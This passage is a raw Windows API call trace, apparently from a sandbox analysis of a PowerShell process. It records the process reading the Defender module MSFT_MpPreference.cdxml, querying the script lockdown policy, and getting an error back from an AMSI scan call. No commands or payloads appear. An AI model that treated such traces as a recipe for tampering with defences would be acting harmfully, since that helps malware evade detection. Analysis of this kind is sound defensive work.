lpData=0x2476c40, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0270.685] RegCloseKey (hKey=0x3b8) returned 0x0 [0270.685] CoTaskMemAlloc (cb=0x10) returned 0x1ace8030 [0270.685] CoTaskMemAlloc (cb=0x50) returned 0x1acc7b70 [0270.685] WinVerifyTrust () returned 0x0 [0270.686] CoTaskMemFree (pv=0x1acc7b70) [0270.686] CoTaskMemFree (pv=0x1ace8030) [0270.686] CertFreeCertificateContext (pCertContext=0x1ad09fa0) returned 1 [0270.686] CloseHandle (hObject=0x5ec) returned 1 [0270.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0270.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0270.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0270.687] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5ec [0270.687] GetFileType (hFile=0x5ec) returned 0x1 [0270.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83ccb8) returned 1 [0270.687] GetFileType (hFile=0x5ec) returned 0x1 [0270.688] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0270.688] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.689] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0270.689] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.689] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0270.689] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.690] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0270.690] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.691] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x4000 [0270.691] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.691] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x5000 [0270.691] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.692] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x6000 [0270.692] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.692] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x7000 [0270.692] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.693] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x8000 [0270.693] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.693] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x9000 [0270.693] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.711] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xa000 [0270.711] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.711] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xb000 [0270.711] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.712] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xc000 [0270.712] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.712] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xd000 [0270.713] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.713] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xe000 [0270.713] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0270.713] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xf000 [0270.713] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x992, lpOverlapped=0x0) returned 1 [0270.714] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xf992 [0270.714] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477262, nNumberOfBytesToRead=0x26e, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477262*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0270.714] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0xf992 [0270.714] ReadFile (in: hFile=0x5ec, lpBuffer=0x2477d80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2477d80*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0270.718] CoTaskMemAlloc (cb=0x20c) returned 0x1acf22f0 [0270.718] GetSystemDirectoryW (in: lpBuffer=0x1acf22f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0270.719] CoTaskMemFree (pv=0x1acf22f0) [0270.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0270.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0270.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0270.719] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0270.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0270.719] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0270.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x60c) returned 0x0 [0270.720] RegQueryValueExW (in: hKey=0x60c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0270.720] RegCloseKey (hKey=0x60c) returned 0x0 [0270.721] CloseHandle (hObject=0x5ec) returned 1 [0270.892] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.892] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.893] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.893] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.893] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.893] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.894] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.894] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.894] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.894] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.894] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.894] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.894] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.894] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.894] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.894] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.895] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.895] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.896] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.896] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.896] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.896] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.896] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.896] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.896] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.896] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.896] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.896] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.897] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.897] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.897] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.897] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.897] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.897] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.897] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.897] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.897] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.898] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.898] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.898] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.898] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.898] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.898] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.898] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.898] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.898] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.898] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.898] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.898] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.898] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.898] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.899] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.899] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.899] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.899] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.899] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.899] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.899] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.899] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.899] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.899] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.899] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.899] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.899] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.899] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.900] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.900] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.900] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.900] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.900] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.900] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.900] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0270.900] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x0 [0270.901] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x2 [0271.094] CoCreateGuid (in: pguid=0x1b83b878 | out: pguid=0x1b83b878*(Data1=0x1b5f8f88, Data2=0x813d, Data3=0x4d7d, Data4=([0]=0x96, [1]=0xb7, [2]=0xd7, [3]=0x13, [4]=0x5, [5]=0x7b, [6]=0x57, [7]=0xc7))) returned 0x0 [0273.795] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0xdc0cd711, Data2=0xb33c, Data3=0x4457, Data4=([0]=0x91, [1]=0xbb, [2]=0x35, [3]=0x2, [4]=0xd2, [5]=0x8, [6]=0x3b, [7]=0xdc))) returned 0x0 [0273.800] AmsiScanBuffer () returned 0x80070015 [0273.870] EtwEventWriteTransfer () returned 0x0 [0273.872] EtwEventWriteTransfer () returned 0x0 [0273.875] EtwEventWriteTransfer () returned 0x0 [0273.877] EtwEventWriteTransfer () returned 0x0 [0273.880] EtwEventWriteTransfer () returned 0x0 [0273.881] EtwEventWriteTransfer () returned 0x0 [0273.883] EtwEventWriteTransfer () returned 0x0 [0273.884] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0273.885] EtwEventActivityIdControl () returned 0x0 [0273.885] EtwEventActivityIdControl () returned 0x0 [0273.885] EtwEventActivityIdControl () returned 0x0 [0273.886] EtwEventActivityIdControl () returned 0x0 [0273.887] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0273.888] EtwEventActivityIdControl () returned 0x0 [0273.888] EtwEventActivityIdControl () returned 0x0 [0273.888] EtwEventActivityIdControl () returned 0x0 [0273.889] EtwEventActivityIdControl () returned 0x0 [0273.889] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xc120f1c9, Data2=0x3c32, Data3=0x4a13, Data4=([0]=0xa8, [1]=0x37, [2]=0x4d, [3]=0x1f, [4]=0x3f, [5]=0x9d, [6]=0x29, [7]=0x21))) returned 0x0 [0273.889] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xa1ba4731, Data2=0xc215, Data3=0x491b, Data4=([0]=0x91, [1]=0x8b, [2]=0x2d, [3]=0xa1, [4]=0x5d, [5]=0xc1, [6]=0x77, [7]=0xa3))) returned 0x0 [0273.889] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0273.890] EtwEventActivityIdControl () returned 0x0 [0273.890] EtwEventActivityIdControl () returned 0x0 [0273.890] EtwEventActivityIdControl () returned 0x0 [0273.892] EtwEventActivityIdControl () returned 0x0 [0273.892] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xb6a51349, Data2=0xf71f, Data3=0x49f7, Data4=([0]=0xa6, [1]=0xf, [2]=0x1d, [3]=0x7a, [4]=0xbd, [5]=0xb9, [6]=0x6c, [7]=0x98))) returned 0x0 [0273.893] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0273.893] EtwEventActivityIdControl () returned 0x0 [0273.893] EtwEventActivityIdControl () returned 0x0 [0273.893] EtwEventActivityIdControl () returned 0x0 [0273.902] EtwEventActivityIdControl () returned 0x0 [0273.902] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x100b67d5, Data2=0xed89, Data3=0x4598, Data4=([0]=0x9d, [1]=0xfe, [2]=0x5f, [3]=0xec, [4]=0x22, [5]=0xf6, [6]=0x81, [7]=0xc0))) returned 0x0 [0273.902] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0273.991] EtwEventActivityIdControl () returned 0x0 [0273.991] EtwEventActivityIdControl () returned 0x0 [0273.991] EtwEventActivityIdControl () returned 0x0 [0274.007] EtwEventActivityIdControl () returned 0x0 [0274.007] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xd024f783, Data2=0x898e, Data3=0x4cba, Data4=([0]=0xb6, [1]=0xdd, [2]=0x32, [3]=0xea, [4]=0x5d, [5]=0x76, [6]=0x99, [7]=0x47))) returned 0x0 [0274.008] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0274.008] EtwEventActivityIdControl () returned 0x0 [0274.008] EtwEventActivityIdControl () returned 0x0 [0274.008] EtwEventActivityIdControl () 